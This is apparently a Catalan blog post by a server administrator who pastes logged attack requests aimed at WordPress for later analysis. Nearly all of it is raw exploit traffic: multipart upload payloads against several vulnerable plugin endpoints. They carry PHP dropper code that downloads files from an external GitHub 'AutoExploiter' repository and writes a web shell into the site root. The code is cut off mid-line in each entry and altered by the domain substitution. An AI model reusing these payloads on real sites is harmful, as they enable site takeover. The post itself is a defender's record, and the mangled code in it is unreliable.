peticio que arriba al servidor, he modificat el nom de domini del servidor per URL-DOMINI, donat que va buscant wp-admin, es tracta de sistema d'atac segurament a wordpress
suposso que cerquen algun tipus de vulnerabilitat pero només he pujat el contigut per un altre moment analitzar-ho.
URL-DOMINI/wp-admin/admin-ajax.php (POST --02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22action%22nm_personalizedproduct_upload_file--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22name%22upload.php--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22Content-Type: multipart/form-data
Vuln!! patch it Now!
$im = curl_init($url);
curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10);
curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0);
return curl_exec($im);
curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){ echo $check.%22%22;}else echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploite), URL-DOMINI/wp-admin/admin-ajax.php?action=getcountryuser&cs=2 (POST --fb3e771fb1bc46fd8574153def3e543cContent-Disposition: form-data; name=%22popimg%22; filename=%22settings_auto.php%22
Vuln!! patch it Now! $im = curl_init($url);
curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10);
curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0);
return curl_exec($im);
curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){ echo $check.%22%22;}else echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){ echo $check2.%22%22;}else echo %22not exits%22;echo %22done .\n %22 ;@unlink(__FIL), URL-DOMINI/wp-admin/admin-post.php (POST --73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22page%22pagelines--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22settings_upload%22settings--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22
Vuln!! patch it Now! $im = curl_init($url);
curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10);
curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0);
return curl_exec($im);
curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){ echo $check.%22%22;}else echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = ), URL-DOMINI/wp-content/plugins/barclaycart/uploadify/uploadify.php (POST --6919b300ff3848a9aa59b607a4054b2dContent-Disposition: form-data; name=%22Filedata%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-data
Vuln!! patch it Now! $im = curl_init($url);
curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10);
curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0);
return curl_exec($im);
curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){ echo $check.%22%22;}else echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){ echo $check2.%22%22;}else echo %22n), URL-DOMINI/wp-content/plugins/cherry-plugin/admin/import-export/upload.php (POST --0b046a619cbb41288861f394d4dbb9cbContent-Disposition: form-data; name=%22file%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-data
Vuln!! patch it Now! $im = curl_init($url);
curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10);
curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1);
curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0);
return curl_exec($im);
curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){ echo $check.%22%22;}else echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){ echo $check2.%22%22;}else ec)
Entrades
Cap comentari:
Publica un comentari a l'entrada